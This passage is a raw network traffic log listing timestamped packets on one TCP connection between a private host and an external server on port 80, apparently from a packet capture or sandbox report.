Nov 20, 2024 10:11:25.330960035 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.330997944 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.331403017 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.331413984 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.331423998 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.331444025 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.331453085 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.331629038 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.331670046 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.416903973 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.416959047 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467004061 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467015982 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467055082 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467135906 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467147112 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467179060 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467187881 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467221975 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467335939 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467348099 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467359066 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467374086 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467387915 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467788935 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467801094 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467813015 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.467838049 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467848063 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.467988968 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468002081 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468012094 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468022108 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468027115 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468034983 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468050003 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468061924 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468365908 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468378067 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468414068 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468426943 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468585014 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468595982 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468606949 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468617916 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468625069 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468632936 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468638897 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468646049 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.468652964 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468666077 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.468681097 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.469269037 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469279051 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469290972 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469304085 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469310045 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.469314098 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469322920 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.469326973 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469336987 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.469340086 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.469350100 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.469364882 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.470124006 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470134974 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470144987 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470156908 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470168114 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470176935 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.470180035 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470191002 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.470202923 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.470221996 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.470679998 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470691919 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470701933 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470714092 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.470729113 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.470743895 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.471189022 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471199989 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471210957 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471223116 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471234083 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471235991 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.471246958 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471255064 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.471260071 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.471263885 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.471280098 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.471291065 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472091913 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472104073 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472114086 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472125053 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472137928 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472141027 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472151041 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472157955 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472162962 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472174883 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472179890 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472194910 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472208977 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472934008 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472949028 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472959042 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472970009 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.472980976 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.472995996 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.473157883 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473167896 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473198891 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.473341942 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473354101 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473365068 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473388910 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.473402977 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.473555088 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473566055 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473576069 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473603010 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.473614931 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.473618984 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.473685026 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.474042892 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474055052 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474095106 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.474107981 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.474162102 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474174023 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474183083 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474195004 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474206924 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.474220991 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.474368095 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.474412918 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.610430002 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610456944 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610470057 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610487938 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.610519886 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.610523939 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610537052 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610548973 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610560894 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610569954 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.610584021 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.610596895 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.610872984 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610884905 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.610920906 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611083031 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611094952 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611105919 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611116886 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611128092 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611139059 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611152887 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611166954 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611500978 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611512899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611524105 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611536026 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611546993 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611552000 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611560106 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611562967 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611572027 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611584902 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.611596107 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611596107 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611605883 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.611619949 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.612271070 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612282991 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612293005 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612303972 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612314939 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612322092 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.612327099 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612334967 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.612339973 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612346888 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.612351894 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.612361908 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.612375021 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.612390995 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613195896 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613207102 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613217115 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613231897 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613240957 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613245010 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613254070 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613256931 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613267899 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613267899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613279104 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613281012 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613291025 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613293886 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613302946 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613306046 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.613317013 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.613332987 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614017963 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614028931 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614038944 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614052057 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614063025 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614064932 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614075899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614075899 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614087105 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614099979 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614105940 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614120007 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614130974 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614913940 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614926100 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614933968 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614944935 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614957094 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614958048 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614969969 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614969969 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614983082 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.614984989 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.614995003 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.615001917 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615006924 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.615016937 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615020037 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.615029097 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615041971 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615056038 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615144968 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615683079 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.615731001 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.615741014 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.615777969 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.616426945 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616463900 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616475105 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616509914 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.616674900 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616687059 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616697073 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616708040 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616718054 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.616733074 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.616986990 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.616998911 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617031097 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617193937 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617206097 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617216110 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617228031 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617238998 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617249012 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617255926 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617259979 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617266893 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617271900 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617283106 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617285013 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617294073 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617297888 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617309093 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617309093 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617319107 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617321968 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.617338896 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617348909 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.617438078 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618156910 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618169069 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618180037 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618191004 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618201017 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618206024 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618212938 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618213892 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618226051 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618230104 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618240118 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618242979 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618252039 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618258953 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618263960 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618271112 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618277073 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618284941 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618298054 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618310928 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.618923903 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618935108 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.618972063 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619036913 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619049072 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619060040 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619071007 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619081974 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619083881 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619092941 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619096041 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619105101 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619112968 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619117022 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619122028 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619129896 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.619141102 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619149923 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.619163036 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620168924 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620182037 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620193958 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620206118 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620217085 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620217085 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620229006 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620230913 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620244026 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620250940 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620256901 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620266914 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620270014 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620279074 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620289087 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620290995 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620301962 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620321989 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620759964 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620770931 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620780945 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620791912 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.620805979 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.620817900 CET	49170	80	192.168.2.22	66.63.187.231
